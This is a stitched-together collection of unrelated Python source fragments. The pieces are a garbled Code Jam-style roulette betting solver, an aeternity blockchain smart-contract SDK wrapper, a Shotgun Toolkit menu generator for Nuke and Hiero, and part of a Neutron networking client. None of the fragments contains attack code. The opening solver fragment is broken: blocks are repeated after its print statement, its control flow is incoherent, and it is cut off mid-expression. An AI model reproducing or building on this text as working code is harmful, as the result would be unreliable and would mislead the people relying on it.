next_larger = min(larger)
can_replicate = min(next_larger - lowest - 1,
remaining_budget / lowest_cnt)
else:
can_replicate = remaining_budget / lowest_cnt
if can_replicate > 0:
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
for exclude in xrange(0, min(remaining_budget, partial) + 1):
cand = get_expected(placed, lowest, exclude
) - exclude - needed_budget
ret = max(ret, cand)
print 'Case #%d: %.10lf' % (cc + 1, ret)
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
return cc
def func_8a361a215a1b4fa9902633f4f455fb96(cases, infile):
for cc in xrange(cases):
budget, bets = map(int, infile.readline().split())
placed = sorted(map(int, infile.readline().split()))
ret = 0.0
queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
placed]
queue = sorted(set(queue))
seen = set(queue)
while queue:
lowest = queue.pop()
if lowest == 0:
continue
needed_budget = (37 - len(placed)) * lowest
for p in placed:
needed_budget += max(0, lowest - p)
if budget < needed_budget:
continue
remaining_budget = budget - needed_budget
partial = len([p for p in placed if p <= lowest])
lowest_cnt = 37 - len(placed) + partial
if lowest_cnt == 0:
continue
larger = [p for p in placed if p > lowest]
if larger:
next_larger = min(larger)
can_replicate = min(next_larger - lowest - 1,
remaining_budget / lowest_cnt)
else:
can_replicate = remaining_budget / lowest_cnt
if can_replicate > 0:
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest | |
<gh_stars>10-100
from aeternity import utils, defaults, identifiers, signing, compiler, hashing
from aeternity.contract import Contract
from munch import Munch
class ContractNative(object):
CONTRACT_ERROR_TYPES = ["revert", "abort", "error"]
def __init__(self, **kwargs):
"""
Initialize a ContractNative object
:param client: an instance of NodeClient
:param source: the source code of the contract
:param compiler: an instance of the CompilerClient
:param address: address of the currently deployed contract (optional)
:param gas: Gas to be used for all contract interactions (optional)
:param fee: fee to be used for all contract interactions (optional)
:param gas_price: Gas price to be used for all contract interactions (optional)
:param account: Account to be used for contract deploy and contract calls (optional)
:param use_dry_run: use dry run for all method calls except for payable and stateful methods (default: True)
"""
if 'client' in kwargs:
self.client = kwargs.get('client')
self.contract = Contract(self.client)
else:
raise ValueError("Node client is not provided")
self.compiler = kwargs.get('compiler', None)
if self.compiler is None:
raise ValueError("Compiler is not provided")
else:
if isinstance(self.compiler, str):
self.compiler = compiler.CompilerClient(self.compiler)
self.source = kwargs.get('source', None)
if self.source is not None:
self.bytecode = self.compiler.compile(self.source).bytecode
self.aci = self.compiler.aci(self.source)
else:
raise ValueError("contract source not provided")
self.contract_name = self.aci.encoded_aci.contract.name
self.gas = kwargs.get('gas', defaults.CONTRACT_GAS)
self.gas_price = kwargs.get('gas_price', defaults.CONTRACT_GAS_PRICE)
self.fee = kwargs.get('fee', defaults.FEE)
self.contract_amount = kwargs.get('amount', defaults.CONTRACT_AMOUNT)
self.use_dry_run = kwargs.get('use_dry_run', True)
address = kwargs.get('address', None)
if address:
self.at(address)
self.account = kwargs.get('account', None)
if self.account and type(self.account) is not signing.Account:
raise TypeError("Invalid account type. Use `class Account` for creating an account")
self.sophia_transformer = SophiaTransformation()
self.__generate_methods()
def __generate_methods(self):
if self.aci:
for f in self.aci.encoded_aci.contract.functions:
self.__add_contract_method(Munch.fromDict({
"name": f.name,
"doc": f"Contract Method {f.name}",
"arguments": f.arguments,
"returns": f.returns,
"stateful": f.stateful,
"payable": f.payable
}))
def __encode_method_args(self, method, *args):
if len(args) != len(method.arguments):
raise ValueError(f"Invalid number of arguments. Expected {len(method.arguments)}, Provided {len(args)}")
transformed_args = []
for i, val in enumerate(args):
transformed_args.append(self.sophia_transformer.convert_to_sophia(val, method.arguments[i].type, self.aci.encoded_aci))
return self.compiler.encode_calldata(self.source, method.name, *transformed_args).calldata
def __decode_method_args(self, method, args):
return self.sophia_transformer.convert_to_py(args, method.returns, self.aci.encoded_aci)
def __add_contract_method(self, method):
def contract_method(*args, **kwargs):
calldata = self.__encode_method_args(method, *args)
use_dry_run = kwargs.get('use_dry_run', self.use_dry_run)
call_info = None
if method.stateful or method.payable or not use_dry_run:
tx_hash = self.call(method.name, calldata, **kwargs).hash
call_info = self.contract.get_call_object(tx_hash)
call_info.tx_hash = tx_hash
else:
call_info = self.call_static(method.name, calldata, **kwargs)
if call_info.result == 'error':
raise ValueError(call_info.reason)
call_info = call_info.call_obj
decoded_call_result = self.compiler.decode_call_result(self.source, method.name, call_info.return_value, call_info.return_type)
if call_info.return_type in self.CONTRACT_ERROR_TYPES:
if isinstance(decoded_call_result, dict):
[(k, v)] = decoded_call_result.items()
else:
(k, v) = decoded_call_result
raise RuntimeError(f"Error occurred while executing the contract method. Error Type: {k}. Error Message: {v[0]}")
return call_info, self.__decode_method_args(method, decoded_call_result)
contract_method.__name__ = method.name
contract_method.__doc__ = method.doc
setattr(self, contract_method.__name__, contract_method)
def __process_options(self, **kwargs):
gas = self.gas if kwargs.get('gas') is None else kwargs.get('gas')
gas_price = self.gas_price if kwargs.get('gas_price') is None else kwargs.get('gas_price')
amount = self.contract_amount if kwargs.get('amount') is None else kwargs.get('amount')
fee = self.fee if kwargs.get('fee') is None else kwargs.get('fee')
account = self.account if kwargs.get('account') is None else kwargs.get('account')
use_dry_run = kwargs.get("use_dry_run", False)
if account is None and use_dry_run is False:
raise ValueError("Please provide an account to sign contract call transactions. You can set a default account using 'set_account' method")
if account and type(account) is not signing.Account:
raise TypeError("Invalid account type. Use `class Account` for creating an account")
return Munch.fromDict({
"gas": gas,
"gas_price": gas_price,
"amount": amount,
"fee": fee,
"account": account
})
def at(self, address):
"""
Set contract address
"""
if not address or not utils.is_valid_hash(address, prefix=identifiers.CONTRACT_ID):
raise ValueError(f"Invalid contract address {address}")
if not self.contract.is_deployed(address):
raise ValueError("Contract not deployed")
self._compare_bytecode(address)
self.address = address
self.deployed = True
def _compare_bytecode(self, address):
onchain_bc = self.client.get_contract_code(pubkey=address).bytecode
self.compiler.validate_bytecode(self.source, onchain_bc)
def set_account(self, account):
if account is None:
raise ValueError("Account can not be of None type")
if type(account) is not signing.Account:
raise TypeError("Invalid account type. Use `class Account` for creating an account")
self.account = account
def deploy(self, *arguments, entrypoint="init",
deposit=defaults.CONTRACT_DEPOSIT,
vm_version=None,
abi_version=None,
tx_ttl=defaults.TX_TTL,
**kwargs):
"""
Create a contract and deploy it to the chain
:return: the transaction
"""
method_list = list(filter(lambda f: f.name == entrypoint, self.aci.encoded_aci.contract.functions))
calldata = None
if len(method_list) == 1 and method_list[0].name == entrypoint:
calldata = self.__encode_method_args(method_list[0], *arguments)
else:
calldata = self.compiler.encode_calldata(self.source, entrypoint, *arguments).calldata
opts = self.__process_options(**kwargs)
tx = self.contract.create(opts.account, self.bytecode, calldata, opts.amount, deposit, opts.gas,
opts.gas_price, opts.fee, vm_version, abi_version, tx_ttl)
self.at(tx.metadata.contract_id)
return tx
def call(self, function, calldata,
abi_version=None,
tx_ttl=defaults.TX_TTL,
**kwargs):
"""
call a contract method
:return: the transaction
"""
opts = self.__process_options(**kwargs)
return self.contract.call(self.address, opts.account, function, calldata, opts.amount, opts.gas,
opts.gas_price, opts.fee, abi_version, tx_ttl)
def call_static(self, function, calldata,
abi_version=None,
tx_ttl=defaults.TX_TTL,
top=None,
**kwargs):
"""
call-static a contract method
:return: the call object
"""
kwargs["use_dry_run"] = True
opts = self.__process_options(**kwargs)
if opts.get('account') is None:
return self.contract.call_static(self.address, function, calldata, gas=opts.gas,
gas_price=opts.gas_price, fee=opts.fee, abi_version=abi_version,
tx_ttl=tx_ttl, top=top)
return self.contract.call_static(self.address, function, calldata, address=opts.account.get_address(), amount=opts.amount,
gas=opts.gas, gas_price=opts.gas_price, fee=opts.fee, abi_version=abi_version,
tx_ttl=tx_ttl, top=top)
class SophiaTransformation:
TO_SOPHIA_METHOD_PREFIX = 'to_sophia_'
FROM_SOPHIA_METHOD_PREFIX = 'from_sophia_'
def __inject_vars(self, t, aci_types):
[[base_type, generic]] = aci_types.items()
[[_, variant_value]] = t.items()
if base_type == 'variant':
vars_map = []
for x in generic:
[tag, gen] = x.items()[0]
gen_map = []
for y in gen:
var_name_list = list(map(lambda e: e.name, aci_types['vars']))
if y in var_name_list:
index = var_name_list.index(y)
gen_map.append(variant_value[index])
else:
gen_map.append(y)
vars_map.append({[tag]: gen_map})
return {
[base_type]: vars_map
}
def __link_type_def(self, t, bindings):
_, type_defs = t.split('.') if isinstance(t, str) else list(t.keys())[0].split('.')
aci_types = bindings.contract.type_defs + [Munch.fromDict({"name": "state", "typedef": bindings.contract.state, "vars": []})]
aci_types = filter(lambda x: x.name == type_defs, aci_types)
aci_types = list(aci_types)[0]
if len(list(aci_types.vars)) > 0:
aci_types.typedef = self.__inject_vars(t, aci_types)
return aci_types.typedef
def __extract_type(self, sophia_type, bindings={}):
[t] = [sophia_type] if not isinstance(sophia_type, list) else sophia_type
if len(bindings) > 0:
if (isinstance(t, str) and bindings.contract.name in t) or (isinstance(t, dict) > 0 and bindings.contract.name in list(t.keys())[0]):
t = self.__link_type_def(t, bindings)
# map, tuple, list, record, bytes
if isinstance(t, dict):
[(key, val)] = t.items()
return key, val
# base types
if isinstance(t, str):
return t, None
def convert_to_sophia(self, argument, sophia_type, bindings={}):
current_type, generic = self.__extract_type(sophia_type, bindings)
method_name = self.TO_SOPHIA_METHOD_PREFIX + current_type
method = getattr(self, method_name, None)
if method is None:
return f'{argument}'
return method(argument, generic, bindings)
def convert_to_py(self, argument, sophia_type, bindings={}):
current_type, generic = self.__extract_type(sophia_type, bindings)
method_name = self.FROM_SOPHIA_METHOD_PREFIX + current_type
method = getattr(self, method_name, None)
if method is None:
return argument
return method(argument, generic, bindings)
def to_sophia_string(self, arg, generic, bindings={}):
return f'\"{arg}\"'
def to_sophia_signature(self, arg, generic, bindings={}):
return self.to_sophia_bytes(arg, generic, bindings={})
def from_sophia_signature(self, arg, generic, bindings={}):
return self.from_sophia_bytes(arg, generic, bindings={})
def to_sophia_hash(self, arg, generic, bindings={}):
return self.to_sophia_bytes(arg, generic, bindings={})
def from_sophia_hash(self, arg, generic, bindings={}):
return self.from_sophia_bytes(arg, generic, bindings={})
def to_sophia_bytes(self, arg, generic, bindings={}):
if isinstance(arg, str):
val = hashing.decode(arg).hex() if utils.is_valid_hash(arg) else arg
return f'#{val}'
elif isinstance(arg, bytes):
return f"#{arg.hex()}"
def from_sophia_bytes(self, arg, generic, bindings={}):
return arg.split('#')[1]
def to_sophia_bool(self, arg, generic, bindings={}):
return "true" if arg else "false"
def to_sophia_map(self, arg, generic, bindings={}):
if isinstance(arg, dict):
arg = arg.items()
result = '{'
for i, val in enumerate(arg):
k, v = val
if i != 0:
result += ','
result += f"[{self.convert_to_sophia(k, generic[0], bindings)}] = {self.convert_to_sophia(v, generic[1], bindings)}"
return result + '}'
def from_sophia_map(self, arg, generic, bindings={}):
[key_t, value_t] = generic
result = {}
for (key, val) in arg:
key = self.convert_to_py(key, key_t, bindings)
val = self.convert_to_py(val, value_t, bindings)
result[key] = val
return result
def to_sophia_list(self, arg, generic, bindings={}):
result = "["
for val in arg:
result += f"{self.convert_to_sophia(val, generic, bindings)},"
return result[:-1] + "]"
def from_sophia_list(self, arg, generic, bindings={}):
result = []
for x in arg:
result.append(self.convert_to_py(x, generic, bindings))
return result
def to_sophia_option(self, arg, generic, bindings={}):
return 'None' if arg is None else f"Some({self.convert_to_sophia(arg, generic, bindings)})"
def from_sophia_option(self, arg, generic, bindings={}):
if arg == 'None':
return None
else:
[(variantType, [value])] = arg.items()
if variantType == 'Some':
return self.convert_to_py(value, generic, bindings)
else:
return None
def to_sophia_tuple(self, arg, generic, bindings={}):
result = "("
for i, val in enumerate(arg):
result += f"{self.convert_to_sophia(val, generic[i], bindings)},"
return result[:-1] + ")"
def to_sophia_record(self, arg, generic, bindings={}):
result = '{'
for i, val in enumerate(generic):
if i != 0:
result += ','
result += f"{val['name']} = {self.convert_to_sophia(arg[val['name']], val['type'], bindings)}"
return result + '}'
def from_sophia_record(self, arg, generic, bindings={}):
result = {}
generic_map = {}
for val in generic:
generic_map[val['name']] = {'type': val['type']}
for [name, | |
<gh_stars>1-10
# Copyright (c) 2016 Shotgun Software Inc.
#
# CONFIDENTIAL AND PROPRIETARY
#
# This work is provided "AS IS" and subject to the Shotgun Pipeline Toolkit
# Source Code License included in this distribution package. See LICENSE.
# By accessing, using, copying or modifying this work you indicate your
# agreement to the Shotgun Pipeline Toolkit Source Code License. All rights
# not expressly granted therein are reserved by Shotgun Software Inc.
"""Menu handling for Nuke and Hiero."""
import tank
import sys
import nuke
import os
import unicodedata
import nukescripts.openurl
import nukescripts
# -----------------------------------------------------------------------------
class BaseMenuGenerator(object):
"""
The base class for Nuke based menu generators.
"""
def __init__(self, engine, menu_name):
"""
Initializes a new menu generator.
:param engine: The currently-running engine.
:type engine: :class:`tank.platform.Engine`
:param menu_name: The name of the menu to be created.
"""
self._engine = engine
self._menu_name = menu_name
engine_root_dir = self.engine.disk_location
self._shotgun_logo = os.path.abspath(
os.path.join(
engine_root_dir,
"resources",
"sg_logo_80px.png",
),
)
self._shotgun_logo_blue = os.path.abspath(
os.path.join(
engine_root_dir,
"resources",
"sg_logo_blue_32px.png",
),
)
@property
def engine(self):
"""
The currently-running engine.
"""
return self._engine
@property
def menu_name(self):
"""
The name of the menu to be generated.
"""
return self._menu_name
def create_sgtk_error_menu(self):
"""
Creates an "error" menu item.
"""
(exc_type, exc_value, exc_traceback) = sys.exc_info()
msg = ("Message: Shotgun encountered a problem starting the Engine.\n"
"Exception: %s - %s\n"
"Traceback (most recent call last): %s" % (exc_type,
exc_value,
"\n".join(traceback.format_tb(exc_traceback))))
self._disable_menu("[Toolkit Error - Click for details]", msg)
def create_sgtk_disabled_menu(self, details=""):
"""
Creates a "disabled" Shotgun menu item.
:param details: A detailed message about why Toolkit has been
disabled.
"""
msg = ("Shotgun integration is currently disabled because the file you "
"have opened is not recognized. Shotgun cannot "
"determine which Context the currently-open file belongs to. "
"In order to enable Toolkit integration, try opening another "
"file. <br><br><i>Details:</i> %s" % details)
self._disable_menu("[Toolkit is disabled - Click for details]", msg)
def create_disabled_menu(self, cmd_name, msg):
"""
Implemented in deriving classes to create a "disabled" menu.
:param cmd_name: An AppCommand object to associate with the disabled
menu command.
:param msg: A message explaining why Toolkit is disabled.
"""
self.engine.logger.debug(
'Not implemented: %s.%s',
self.__class__.__name__,
'create_disabled_menu'
)
def _disable_menu(self, cmd_name, msg):
"""
Disables the Shotgun menu.
:param cmd_name: An AppCommand object to associate with the disabled
menu command.
:param msg: A message explaining why Toolkit is disabled.
"""
if self._menu_handle:
self.destroy_menu()
self.create_disabled_menu(cmd_name, msg)
def _jump_to_sg(self):
"""
Jump from a context to Shotgun.
"""
from tank.platform.qt import QtCore, QtGui
url = self.engine.context.shotgun_url
QtGui.QDesktopServices.openUrl(QtCore.QUrl(url))
def _jump_to_fs(self):
"""
Jump from a context to the filesystem.
"""
paths = self.engine.context.filesystem_locations
for disk_location in paths:
system = sys.platform
if system == "linux2":
cmd = 'xdg-open "%s"' % disk_location
elif system == "darwin":
cmd = 'open "%s"' % disk_location
elif system == "win32":
cmd = 'cmd.exe /C start "Folder" "%s"' % disk_location
else:
raise OSError("Platform '%s' is not supported." % system)
exit_code = os.system(cmd)
if exit_code != 0:
self.engine.logger.error("Failed to launch '%s'!", cmd)
# -----------------------------------------------------------------------------
class HieroMenuGenerator(BaseMenuGenerator):
"""
A Hiero specific menu generator.
"""
def __init__(self, engine, menu_name):
"""
Initializes a new menu generator.
:param engine: The currently-running engine.
:type engine: :class:`tank.platform.Engine`
:param menu_name: The name of the menu to be created.
"""
super(HieroMenuGenerator, self).__init__(engine, menu_name)
self._menu_handle = None
self._context_menus_to_apps = dict()
def _create_hiero_menu(self, add_commands=True, commands=None):
"""
Creates the "Shotgun" menu in Hiero.
:param bool add_commands: If True, menu commands will be added to the
newly-created menu. If False, the menu will be created, but no
contents will be added. Defaults to True.
:param dict commands: The engine commands to add to the various menus.
The dictionary is structured the same as engine.commands is, where
the key is the name of the command, and the value is a dictionary
of command properties.
"""
import hiero
if self._menu_handle is not None:
self.destroy_menu()
from sgtk.platform.qt import QtGui
self._menu_handle = QtGui.QMenu("Shotgun")
help = hiero.ui.findMenuAction("Cache")
menuBar = hiero.ui.menuBar()
menuBar.insertMenu(help, self._menu_handle)
self._menu_handle.clear()
# If we were asked not to add any commands to the menu,
# then bail out.
if not add_commands:
return
# Now add the context item on top of the main menu.
self._context_menu = self._add_context_menu()
self._menu_handle.addSeparator()
if not commands:
return
# Now enumerate all items and create menu objects for them.
menu_items = []
for (cmd_name, cmd_details) in commands.items():
menu_items.append(HieroAppCommand(self.engine, cmd_name, cmd_details))
# Now add favourites.
for fav in self.engine.get_setting("menu_favourites"):
app_instance_name = fav["app_instance"]
menu_name = fav["name"]
# Scan through all menu items.
for cmd in menu_items:
if cmd.app_instance_name == app_instance_name and cmd.name == menu_name:
# Found our match!
cmd.add_command_to_menu(self._menu_handle)
# Mark as a favourite item.
cmd.favourite = True
# Get the apps for the various context menus.
self._context_menus_to_apps = {
"bin_context_menu": [],
"timeline_context_menu": [],
"spreadsheet_context_menu": [],
}
remove = set()
for (key, apps) in self._context_menus_to_apps.iteritems():
items = self.engine.get_setting(key)
for item in items:
app_instance_name = item["app_instance"]
menu_name = item["name"]
# Scan through all menu items.
for (i, cmd) in enumerate(menu_items):
if cmd.app_instance_name == app_instance_name and cmd.name == menu_name:
# Found the match.
apps.append(cmd)
cmd.requires_selection = item["requires_selection"]
if not item["keep_in_menu"]:
remove.add(i)
break
for index in sorted(remove, reverse=True):
del menu_items[index]
# Register for the interesting events.
hiero.core.events.registerInterest(
"kShowContextMenu/kBin",
self.eventHandler,
)
hiero.core.events.registerInterest(
"kShowContextMenu/kTimeline",
self.eventHandler,
)
# Note that the kViewer works differently than the other things
# (returns a hiero.ui.Viewer object: http://docs.thefoundry.co.uk/hiero/10/hieropythondevguide/api/api_ui.html#hiero.ui.Viewer)
# so we cannot support this easily using the same principles as for the other things.
hiero.core.events.registerInterest(
"kShowContextMenu/kSpreadsheet",
self.eventHandler,
)
self._menu_handle.addSeparator()
# Now go through all of the menu items.
# Separate them out into various sections.
commands_by_app = {}
for cmd in menu_items:
if cmd.type == "context_menu":
cmd.add_command_to_menu(self._context_menu)
else:
# Normal menu.
app_name = cmd.app_name
if app_name is None:
# Unparented app.
app_name = "Other Items"
if not app_name in commands_by_app:
commands_by_app[app_name] = []
commands_by_app[app_name].append(cmd)
# Now add all apps to main menu.
self._add_app_menu(commands_by_app)
def create_menu(self, add_commands=True):
"""
Creates the "Shotgun" menu in Hiero.
:param add_commands: If True, menu commands will be added to
the newly-created menu. If False, the menu
will be created, but no contents will be
added. Defaults to True.
"""
self._create_hiero_menu(add_commands=add_commands, commands=self.engine.commands)
def destroy_menu(self):
"""
Destroys the "Shotgun" menu.
"""
import hiero
menuBar = hiero.ui.menuBar()
menuBar.removeAction(self._menu_handle.menuAction())
self._menu_handle.clear()
self._menu_handle = None
# Register for the interesting events.
hiero.core.events.unregisterInterest(
"kShowContextMenu/kBin",
self.eventHandler,
)
hiero.core.events.unregisterInterest(
"kShowContextMenu/kTimeline",
self.eventHandler,
)
# Note that the kViewer works differently than the other things
# (returns a hiero.ui.Viewer object: http://docs.thefoundry.co.uk/hiero/10/hieropythondevguide/api/api_ui.html#hiero.ui.Viewer)
# so we cannot support this easily using the same principles as for the other things.
hiero.core.events.unregisterInterest(
"kShowContextMenu/kSpreadsheet",
self.eventHandler,
)
def eventHandler(self, event):
"""
The engine's Hiero-specific event handler. This is called by Hiero when
events are triggered, which then handles running SGTK-specific event
behaviors.
:param event: The Hiero event object that was triggered.
"""
if event.subtype == "kBin":
cmds = self._context_menus_to_apps["bin_context_menu"]
elif event.subtype == "kTimeline":
cmds = self._context_menus_to_apps["timeline_context_menu"]
elif event.subtype == "kSpreadsheet":
cmds = self._context_menus_to_apps["spreadsheet_context_menu"]
if not cmds:
return
event.menu.addSeparator()
menu = event.menu.addAction("Shotgun")
menu.setEnabled(False)
for cmd in cmds:
enabled = True
if cmd.requires_selection:
if hasattr(event.sender, "selection") and not event.sender.selection():
enabled = False
cmd.sender = event.sender
cmd.event_type = event.type
cmd.event_subtype = event.subtype
cmd.add_command_to_menu(event.menu, enabled)
event.menu.addSeparator()
def _add_context_menu(self):
"""
Adds a context menu which displays the current context.
"""
ctx = self.engine.context
if ctx.entity is None:
ctx_name = "%s" % ctx.project["name"]
elif ctx.step is None and ctx.task is None:
# entity only
# e.g. Shot ABC_123
ctx_name = "%s %s" % (ctx.entity["type"], ctx.entity["name"])
else:
# we have either step or task
task_step = None
if ctx.step:
task_step = ctx.step.get("name")
if ctx.task:
task_step = ctx.task.get("name")
# e.g. [Lighting, Shot ABC_123]
ctx_name = "%s, %s %s" % (task_step, ctx.entity["type"], ctx.entity["name"])
# create the menu object
ctx_menu = self._menu_handle.addMenu(ctx_name)
action = ctx_menu.addAction("Jump to Shotgun")
action.triggered.connect(self._jump_to_sg)
if ctx.filesystem_locations:
action = ctx_menu.addAction("Jump to File System")
action.triggered.connect(self._jump_to_fs)
ctx_menu.addSeparator()
return ctx_menu
def _add_app_menu(self, commands_by_app):
"""
Add all apps to the main menu.
:param commands_by_app: A dict containing a key for each active
app paired with its AppCommand object to be
added to the menu.
"""
for app_name in sorted(commands_by_app.keys()):
if len(commands_by_app[app_name]) > 1:
# | |
flavor."""
return self.delete(self.flavor_path % (flavor))
def list_flavors(self, retrieve_all=True, **_params):
"""Fetches a list of all Neutron service flavors for a project."""
return self.list('flavors', self.flavors_path, retrieve_all,
**_params)
def show_flavor(self, flavor, **_params):
"""Fetches information for a certain Neutron service flavor."""
return self.get(self.flavor_path % (flavor), params=_params)
def update_flavor(self, flavor, body):
"""Update a Neutron service flavor."""
return self.put(self.flavor_path % (flavor), body=body)
def associate_flavor(self, flavor, body):
"""Associate a Neutron service flavor with a profile."""
return self.post(self.flavor_profile_bindings_path %
(flavor), body=body)
def disassociate_flavor(self, flavor, flavor_profile):
"""Disassociate a Neutron service flavor with a profile."""
return self.delete(self.flavor_profile_binding_path %
(flavor, flavor_profile))
def create_service_profile(self, body=None):
"""Creates a new Neutron service flavor profile."""
return self.post(self.service_profiles_path, body=body)
def delete_service_profile(self, flavor_profile):
"""Deletes the specified Neutron service flavor profile."""
return self.delete(self.service_profile_path % (flavor_profile))
def list_service_profiles(self, retrieve_all=True, **_params):
"""Fetches a list of all Neutron service flavor profiles."""
return self.list('service_profiles', self.service_profiles_path,
retrieve_all, **_params)
def list_providernet_types(self, retrieve_all=True, **_params):
"""Fetches a list of all supported provider network types."""
# Pass filters in "params" argument to do_request
return self.list('providernet_types',
self.providernet_types_path, retrieve_all,
**_params)
def list_providernets(self, retrieve_all=True, **_params):
"""Fetches a list of all provider networks."""
# Pass filters in "params" argument to do_request
return self.list('providernets', self.providernets_path, retrieve_all,
**_params)
def list_networks_on_providernet(self, id, **_params):
"""Fetches a list of networks hosted by provider networks."""
return self.get((self.providernet_path + self.PNET_BINDINGS) % id,
params=_params)
def show_providernet(self, providernet, **_params):
"""Fetches information of a certain provider network."""
return self.get(self.providernet_path % (providernet), params=_params)
def create_providernet(self, body=None):
"""Creates a new provider network."""
return self.post(self.providernets_path, body=body)
def update_providernet(self, providernet, body=None):
"""Updates a provider network."""
return self.put(self.providernet_path % (providernet), body=body)
def delete_providernet(self, providernet):
"""Deletes the specified provider network."""
return self.delete(self.providernet_path % (providernet))
def list_providernet_ranges(self, retrieve_all=True, **_params):
"""Fetches a list of all provider network segmentation id ranges."""
# Pass filters in "params" argument to do_request
return self.list('providernet_ranges',
self.providernet_ranges_path, retrieve_all,
**_params)
def show_providernet_range(self, range, **_params):
"""Fetches information of a provider network segmentation range."""
return self.get(self.providernet_range_path % (range), params=_params)
def create_providernet_range(self, body=None):
"""Creates a new provider network segmentation id range."""
return self.post(self.providernet_ranges_path, body=body)
def update_providernet_range(self, range, body=None):
"""Updates a provider network segmentation id range."""
return self.put(self.providernet_range_path % (range), body=body)
def delete_providernet_range(self, range):
"""Deletes the specified provider network segmentation id range."""
return self.delete(self.providernet_range_path % (range))
def show_service_profile(self, flavor_profile, **_params):
"""Fetches information for a certain Neutron service flavor profile."""
return self.get(self.service_profile_path % (flavor_profile),
params=_params)
def update_service_profile(self, service_profile, body):
"""Update a Neutron service profile."""
return self.put(self.service_profile_path % (service_profile),
body=body)
def list_availability_zones(self, retrieve_all=True, **_params):
"""Fetches a list of all availability zones."""
return self.list('availability_zones', self.availability_zones_path,
retrieve_all, **_params)
@debtcollector.renames.renamed_kwarg(
'tenant_id', 'project_id', replace=True)
def get_auto_allocated_topology(self, project_id, **_params):
"""Fetch information about a project's auto-allocated topology."""
return self.get(
self.auto_allocated_topology_path % project_id,
params=_params)
@debtcollector.renames.renamed_kwarg(
'tenant_id', 'project_id', replace=True)
def delete_auto_allocated_topology(self, project_id, **_params):
"""Delete a project's auto-allocated topology."""
return self.delete(
self.auto_allocated_topology_path % project_id,
params=_params)
@debtcollector.renames.renamed_kwarg(
'tenant_id', 'project_id', replace=True)
def validate_auto_allocated_topology_requirements(self, project_id):
"""Validate requirements for getting an auto-allocated topology."""
return self.get_auto_allocated_topology(project_id, fields=['dry-run'])
def list_bgp_speakers(self, retrieve_all=True, **_params):
"""Fetches a list of all BGP speakers for a project."""
return self.list('bgp_speakers', self.bgp_speakers_path, retrieve_all,
**_params)
def show_bgp_speaker(self, bgp_speaker_id, **_params):
"""Fetches information of a certain BGP speaker."""
return self.get(self.bgp_speaker_path % (bgp_speaker_id),
params=_params)
def create_bgp_speaker(self, body=None):
"""Creates a new BGP speaker."""
return self.post(self.bgp_speakers_path, body=body)
def update_bgp_speaker(self, bgp_speaker_id, body=None):
"""Update a BGP speaker."""
return self.put(self.bgp_speaker_path % bgp_speaker_id, body=body)
def delete_bgp_speaker(self, speaker_id):
"""Deletes the specified BGP speaker."""
return self.delete(self.bgp_speaker_path % (speaker_id))
def add_peer_to_bgp_speaker(self, speaker_id, body=None):
"""Adds a peer to BGP speaker."""
return self.put((self.bgp_speaker_path % speaker_id) +
"/add_bgp_peer", body=body)
def remove_peer_from_bgp_speaker(self, speaker_id, body=None):
"""Removes a peer from BGP speaker."""
return self.put((self.bgp_speaker_path % speaker_id) +
"/remove_bgp_peer", body=body)
def add_network_to_bgp_speaker(self, speaker_id, body=None):
"""Adds a network to BGP speaker."""
return self.put((self.bgp_speaker_path % speaker_id) +
"/add_gateway_network", body=body)
def remove_network_from_bgp_speaker(self, speaker_id, body=None):
"""Removes a network from BGP speaker."""
return self.put((self.bgp_speaker_path % speaker_id) +
"/remove_gateway_network", body=body)
def add_vpn_to_bgp_speaker(self, speaker_id, body=None):
"""Adds a VPN to BGP speaker."""
return self.put((self.bgp_speaker_path % speaker_id) +
"/add_bgp_vpn", body=body)
def remove_vpn_from_bgp_speaker(self, speaker_id, body=None):
"""Removes a VPN from BGP speaker."""
return self.put((self.bgp_speaker_path % speaker_id) +
"/remove_bgp_vpn", body=body)
def list_route_advertised_from_bgp_speaker(self, speaker_id, **_params):
"""Fetches a list of all routes advertised by BGP speaker."""
return self.get((self.bgp_speaker_path % speaker_id) +
"/get_advertised_routes", params=_params)
def list_bgp_peers(self, **_params):
"""Fetches a list of all BGP peers."""
return self.get(self.bgp_peers_path, params=_params)
def show_bgp_peer(self, peer_id, **_params):
"""Fetches information of a certain BGP peer."""
return self.get(self.bgp_peer_path % peer_id,
params=_params)
def create_bgp_peer(self, body=None):
"""Create a new BGP peer."""
return self.post(self.bgp_peers_path, body=body)
def update_bgp_peer(self, bgp_peer_id, body=None):
"""Update a BGP peer."""
return self.put(self.bgp_peer_path % bgp_peer_id, body=body)
def delete_bgp_peer(self, peer_id):
"""Deletes the specified BGP peer."""
return self.delete(self.bgp_peer_path % peer_id)
def list_network_ip_availabilities(self, retrieve_all=True, **_params):
"""Fetches IP availability information for all networks"""
return self.list('network_ip_availabilities',
self.network_ip_availabilities_path,
retrieve_all, **_params)
def show_network_ip_availability(self, network, **_params):
"""Fetches IP availability information for a specified network"""
return self.get(self.network_ip_availability_path % (network),
params=_params)
def add_tag(self, resource_type, resource_id, tag, **_params):
"""Add a tag on the resource."""
return self.put(self.tag_path % (resource_type, resource_id, tag))
def replace_tag(self, resource_type, resource_id, body, **_params):
"""Replace tags on the resource."""
return self.put(self.tags_path % (resource_type, resource_id), body)
def remove_tag(self, resource_type, resource_id, tag, **_params):
"""Remove a tag on the resource."""
return self.delete(self.tag_path % (resource_type, resource_id, tag))
def remove_tag_all(self, resource_type, resource_id, **_params):
"""Remove all tags on the resource."""
return self.delete(self.tags_path % (resource_type, resource_id))
def create_trunk(self, body=None):
"""Create a trunk port."""
return self.post(self.trunks_path, body=body)
def update_trunk(self, trunk, body=None):
"""Update a trunk port."""
return self.put(self.trunk_path % trunk, body=body)
def delete_trunk(self, trunk):
"""Delete a trunk port."""
return self.delete(self.trunk_path % (trunk))
def list_trunks(self, retrieve_all=True, **_params):
"""Fetch a list of all trunk ports."""
return self.list('trunks', self.trunks_path, retrieve_all,
**_params)
def show_trunk(self, trunk, **_params):
"""Fetch information for a certain trunk port."""
return self.get(self.trunk_path % (trunk), params=_params)
def trunk_add_subports(self, trunk, body=None):
"""Add specified subports to the trunk."""
return self.put(self.subports_add_path % (trunk), body=body)
def trunk_remove_subports(self, trunk, body=None):
